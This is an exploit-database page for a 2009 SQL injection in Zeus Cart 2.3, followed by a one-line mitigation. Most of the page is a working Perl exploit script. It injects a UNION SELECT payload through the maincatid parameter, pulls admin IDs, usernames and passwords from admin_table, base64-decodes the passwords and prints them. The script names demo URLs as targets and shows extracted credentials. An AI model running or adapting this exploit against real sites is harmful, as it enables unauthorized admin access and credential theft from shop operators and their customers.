header-logo
Suggest Exploit
vendor:
Zeus Cart
by:
Br0ly
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Zeus Cart
Affected Version From: 2.3
Affected Version To: 2.3
Patch Exists: NO
Related CWE: N/A
CPE: a:zeuscart:zeus_cart:2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Zeus Cart V2.3 Sql Injection

Zeus Cart V2.3 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the admin panel of the application. The attacker can use the ‘-9999+union+all+select+concat(0x6272306c79,0x3a,admin_id,0x3a,admin_name,0x3a,admin_password,0x3a,0x6272306c79)+from+admin_table--’ payload to exploit the vulnerability and gain access to the admin panel.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#|------------------------------------------------------------------------------------------------------------------
#| -Info:
#
#| -Name: Zeus Cart V 2.3
#| -Site: http://www.zeuscart.com/
#| -Site Demo: http://www.zeuscart.com/onlinedemo.php?action=skip
#| -Bug: Sql Injection
#| -Found: by Br0ly
#| -BRAZIL >D
#| -Contact: br0ly[dot]Code[at]gmail[dot]com
#|
#| -Gretz: Osirys , xs86 , str0ke
#|
#| -p0c:
#| -SQL INJECTION:
#| 
#| -9999+union+all+select+0--
#|
#| - Demo ONline:
#|
#| -> http://ajdemos.com/demo/zeuscart/v23/?do=featured&action=showmaincatlanding&maincatid=[SQL]
#|   
#|
#| -Exploit: Demo:
#|
#|perl zeuscart.txt http://ajdemos.com/demo/zeuscart/v23/
#|
#|  --------------------------------------
#|   -Zeus Cart V2.3                  
#|   -Sql Injection                      
#|   -by Br0ly                           
#|  --------------------------------------
#|
#|[+] Getting the login,pass
#|
#|[+] User   = demoadmin
#|[+] Pass   = demo123
#|
#|
#| ;D
#|

  use IO::Socket::INET;
  use LWP::UserAgent;
  use MIME::Base64;
 
   my $host    = $ARGV[0];
   my $sql_path = "/?do=featured&action=showmaincatlanding&maincatid=";
   
 
  if (@ARGV < 1) {
      &banner();
      &help("-1");
  }

  elsif(cheek($host) == 1) {
      &banner();
      &xploit($host,$sql_path);
  }
 
  else {
      &banner();
      help("-2");
  }
 
  sub xploit() {

      my $host     = $_[0];
      my $sql_path = $_[1];

      print "[+] Getting the login,pass\n\n";

      my $sql_atk = $host.$sql_path."-9999+union+all+select+concat(0x6272306c79,0x3a,admin_id,0x3a,admin_name,0x3a,admin_password,0x3a,0x6272306c79)+from+admin_table--";
      my $sql_get = get_url($sql_atk);
      my $connect = tag($sql_get);
     
      if($connect =~ /br0ly:(.+):(.+):(.+):br0ly/) {
   
    my $id   = $1;
    my $user = $2;
    my $pass = $3;

      if($id =~ /(.+):/) {
     
      my $id_2 = $1;
      }
     
    my $pass_aux =  base64_decode($pass);

    print "[+] User   = $user\n";
    print "[+] Pass   = $pass_aux\n";
   
    exit(0);
      }
      else {
    print "[-] Exploit, Fail\n";
    exit(0);
     
      }
 }

   sub get_url() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
  }

  sub tag() {
    my $string = $_[0];
    $string =~ s/ /\$/g;
    $string =~ s/\s/\*/g;
    return($string);
  }

  sub cheek() {
    my $host  = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
  }

  sub base64_decode () {
   
    my $str_1 = $_[0];
    my $str_decode = decode_base64($str_1);
    return $str_decode;
  }


  sub help() {

    my $error = $_[0];
    if ($error == -1) {
        print "\n[-] Error, missed some arguments !\n\n";
    }
   
    elsif ($error == -2) {

        print "\n[-] Error, Bad arguments !\n";
    }
 
    print "[*] Usage : perl $0 http://localhost/zeuscart/\n\n";
    print "    Ex:     perl $0 http://localhost/zeuscart/\n\n";
    exit(0);
  }

  sub banner {
    print "\n".
          "  --------------------------------------\n".
          "   -Zeus Cart V2.3                   \n".
          "   -Sql Injection                       \n".
          "   -by Br0ly                            \n".
          "  --------------------------------------\n\n";
  }

# milw0rm.com [2009-05-29]

Navigation

Suggest Exploit

Services By CQR